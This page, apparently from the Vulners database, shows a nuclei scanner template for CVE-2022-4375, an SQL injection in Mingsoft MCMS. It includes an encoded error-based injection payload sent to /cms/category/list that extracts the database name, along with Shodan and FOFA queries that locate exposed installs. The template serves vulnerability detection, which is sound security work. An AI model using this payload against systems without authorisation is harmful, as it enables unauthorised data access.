Lucene search

K

Mingsoft MCMS - SQL Injection

🗓️ 05 Dec 2024 13:09:56Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

SQL injection in Mingsoft MCMS up to 5.2.9 via sqlWhere parameter, critical severity.

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2022-4375
9 Dec 202208:15
nvd
CVE
CVE-2022-4375
9 Dec 202208:15
cve
Github Security Blog
Mingsoft MCMS vulnerable to SQL Injection
9 Dec 202209:30
github
Veracode
SQL Injection
12 Dec 202207:07
veracode
Prion
Sql injection
9 Dec 202208:15
prion
Cvelist
CVE-2022-4375 Mingsoft MCMS list sql injection
9 Dec 202200:00
cvelist
OSV
Mingsoft MCMS vulnerable to SQL Injection
9 Dec 202209:30
osv
id: CVE-2022-4375

info:
  name: Mingsoft MCMS - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Apply the vendor-supplied patch or update to the latest version.
  reference:
    - https://gitee.com/mingSoft/MCMS/issues/I61TG5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4375
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4375
    cwe-id: CWE-89,CWE-707
    epss-score: 0.00263
    epss-percentile: 0.6564
    cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mingsoft
    product: mcms
    shodan-query: http.favicon.hash:1464851260
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2022,mingsoft,mcms,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "mingsoft.net"
        internal: true

  - raw:
      - |
        POST /cms/category/list? HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "java.sql.SQLSyntaxErrorException"
          - "java.sql.SQLException"
        condition: or

      - type: word
        part: body
        words:
          - "Icategorydao.xml"
          - "cms_category"
        condition: or

      - type: status
        status:
          - 500
          - 200
# digest: 4b0a00483046022100b52660dbfc278d0fb902f7b6ad6409c6f8d11eb36a8428bdcf548c90599288af022100f326ca6a4d977c1eb324020c939b918044cc75049970d0050a2db9a0e3adccf8:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
05 Dec 2024 13:56Current
7.7High risk
Vulners AI Score7.7
CVSS39.8
EPSS0.221
4
.json
Report